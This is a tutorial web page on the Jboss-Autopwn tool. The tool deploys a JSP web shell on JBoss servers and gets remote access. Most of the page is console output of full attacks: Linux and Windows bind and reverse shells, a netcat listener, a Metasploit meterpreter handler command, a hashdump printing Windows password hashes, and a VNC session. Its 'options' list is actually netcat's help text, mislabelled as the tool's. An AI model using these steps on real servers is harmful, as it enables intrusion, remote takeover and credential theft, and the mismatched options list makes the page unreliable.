Jboss-Autopwn

Description

This Jboss-Autopwn script deploys a JSP shell on the target JBoss AS server. Once deployed, the script uses its upload and command execution capability to provide an interactive session.

Usage

Options

         	-4		Use IPv4
		-6		Use IPv6
		-b		Allow broadcast
		-C		Send CRLF as line-ending
		-D		Enable the debug socket option
		-d		Detach from stdin
		-h		This help text
		-I length	TCP receive buffer length
		-i secs		Delay interval for lines sent, ports scanned
		-j		Use jumbo frame
		-k		Keep inbound sockets open for multiple connects
		-l		Listen mode, for inbound connects
		-n		Suppress name/port resolutions
		-O length	TCP send buffer length
		-P proxyuser	Username for proxy authentication
		-p port		Specify local port for remote connects
        	-q secs		quit after EOF on stdin and delay of secs
		-r		Randomize remote ports
		-S		Enable the TCP MD5 signature option
		-s addr		Local source address
		-T toskeyword	Set IP Type of Service
		-t		Answer TELNET negotiation
		-U		Use UNIX domain socket
		-u		UDP mode
		-V rtable	Specify alternate routing table
		-v		Verbose
		-w secs		Timeout for connects and final net reads
		-X proto	Proxy protocol: "4", "5" (SOCKS) or "connect"
		-x addr[:port]	Specify proxy address and port
		-Z		DCCP mode
		-z		Zero-I/O mode [used for scanning]

Example

Jboss-Autopwn before proeceeding with it change the root directory to /pentest/exploits/jboss-autopwn-master

source: https://github.com/SpiderLabs/jboss-autopwn

Linux bind shell:

[[email protected] jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null
[x] Retrieving cookie
[x] Now creating BSH script...
[x] .war file created successfully in /tmp
[x] Now deploying .war file:
http://192.168.1.2:8080/browser/browser/browser.jsp
[x] Running as user...:
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[x] Server uname...:
 Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
[!] Would you like to upload a reverse or a bind shell? bind
[!] On which port would you like the bindshell to listen on? 31337
[x] Uploading bind shell payload..
[x] Verifying if upload was successful...
-rwxrwxrwx 1 root root 172 2009-11-22 19:48 /tmp/payload
[x] You should have a bind shell on 192.168.1.2:31337..
[x] Dropping you into a shell...
Connection to 192.168.1.2 31337 port [tcp/*] succeeded!
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
python -c 'import pty; pty.spawn("/bin/bash")'
[[email protected] /]# full interactive shell :-)

Linux reverse shell:

[[email protected] jboss]# nc -lv 31337 &
[1] 15536
[[email protected] jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null
[x] Retrieving cookie
[x] Now creating BSH script...
[x] .war file created successfully in /tmp
[x] Now deploying .war file:
http://192.168.1.2:8080/browser/browser/browser.jsp
[x] Running as user...:
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[x] Server uname...:
 Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
[!] Would you like to upload a reverse or a bind shell? reverse
[!] On which port would you like to accept the reverse shell on? 31337
[x] Uploading reverse shell payload..
[x] Verifying if upload was successful...
-rwxrwxrwx 1 root root 157 2009-11-22 19:49 /tmp/payload
Connection from 192.168.1.2 port 31337 [tcp/*] accepted
[x] You should have a reverse shell on localhost:31337..
[[email protected] jboss]# jobs
[1]+  Running                 nc -lv 31337 &
[[email protected] jboss]# fg 1
nc -lv 31337
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
python -c 'import pty; pty.spawn("/bin/bash")';
[[email protected] /]# full interactive tty :-)
full interactive tty :-)

Windows bind shell:

[[email protected] jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/null
[x] Retrieving cookie
[x] Now creating BSH script...
[x] .war file created succesfully on c:
[x] Now deploying .war file:
[x] Web shell enabled!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp
[x] Server name...:
        Host Name . . . . . . . . . . . . : aquarius
[x] Would you like a reverse or bind shell or vnc(bind)? bind
[x] On which port would you like your bindshell to listen? 31337
[x] Uploading bindshell payload..
[x] Checking that bind shell was uploaded correctly..
[x] Bind shell uploaded: 22/11/2009  18:35            87,552 payload.exe
[x] Now executing bind shell...
[x] Executed bindshell!
[x] Reverting to metasploit....
[*] Started bind handler
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.2:60535 -> 192.168.1.225:31337)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\chris\Desktop\jboss-4.2.3.GA\server\default\tmp\deploy\tmp8376972724011216327browserwin-exp.war>


Windows reverse shell with a Metasploit meterpreter payload:

[[email protected] jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/null
[x] Retrieving cookie
[x] Now creating BSH script...
[x] .war file created successfully on c:
[x] Now deploying .war file:
[x] Web shell enabled!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp
[x] Server name...:
        Host Name . . . . . . . . . . . . : aquarius
[x] Would you like a reverse or bind shell or vnc(bind)? reverse
[x] On which port would you like to accept your reverse shell? 31337
[x] Uploading reverseshell payload..
[x] Checking that the reverse shell was uploaded correctly..
[x] Reverse shell uploaded: 22/11/2009  18:46            87,552 payload.exe
[x] You now have 20 seconds to launch metasploit before I send a reverse shell back.. ctrl-z, bg then type:
framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=31337 E
[x] Now executing reverse shell...
[x] Executed reverse shell!
[[email protected] jboss]#


In terminal 2:

[[email protected] jboss]# msfpro exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=31337 E

[*] Please wait while we load the module tree...
[*] Started reverse handler on port 31337
[*] Starting the payload handler...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.1.2:31337 -> 192.168.1.225:1266)

meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
Administrator:500:xxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxx:::
chris:1005:xxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1004:5cb061f95caf6a9dc7d1bb971b333632:4ac4ee4210529e17665db586df844736:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:293c804ee7b7f93b3919344842b9c98a:::
__vmware_user__:1007:aad3b435b51404eeaad3b435b51404ee:a9fa3213d080de5533c7572775a149f5:::
meterpreter >


Windows VNC shell:

[[email protected] jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/null
[x] Retrieving cookie
[x] Now creating BSH script...
[x] .war file created successfully on c:
[x] Now deploying .war file:
[x] Web shell enabled!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp
[x] Server name...:
        Host Name . . . . . . . . . . . . : aquarius
[x] Would you like a reverse or bind shell or vnc(bind)? vnc
[x] On which port would you like your  vnc shell to listen? 21
[x] Uploading vnc  shell payload..
[x] Checking that vnc shell was uploaded correctly..
[x] vnc shell uploaded: 22/11/2009  19:14            87,552 payload.exe
[x] Now executing vnc  shell...
[x] Executed  vnc shell!
[x] Reverting to metasploit....
[*] Started bind handler
[*] Starting the payload handler...
[*] Sending stage (197120 bytes)
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vnciewer in the background.
[*] VNC Server session 1 opened (192.168.1.2:52682 -> 192.168.1.225:21)

[*] VNC connection closed.

[[email protected] jboss]#

>>VNC window opens here.. :-)
0 Comments

Leave a reply

CONTACT US

We're are building as a community and a team. Be a part of it.

Sending

©2017 Ztrela Knowledge Solutions Pvt. Ltd

Log in with your credentials

Forgot your details?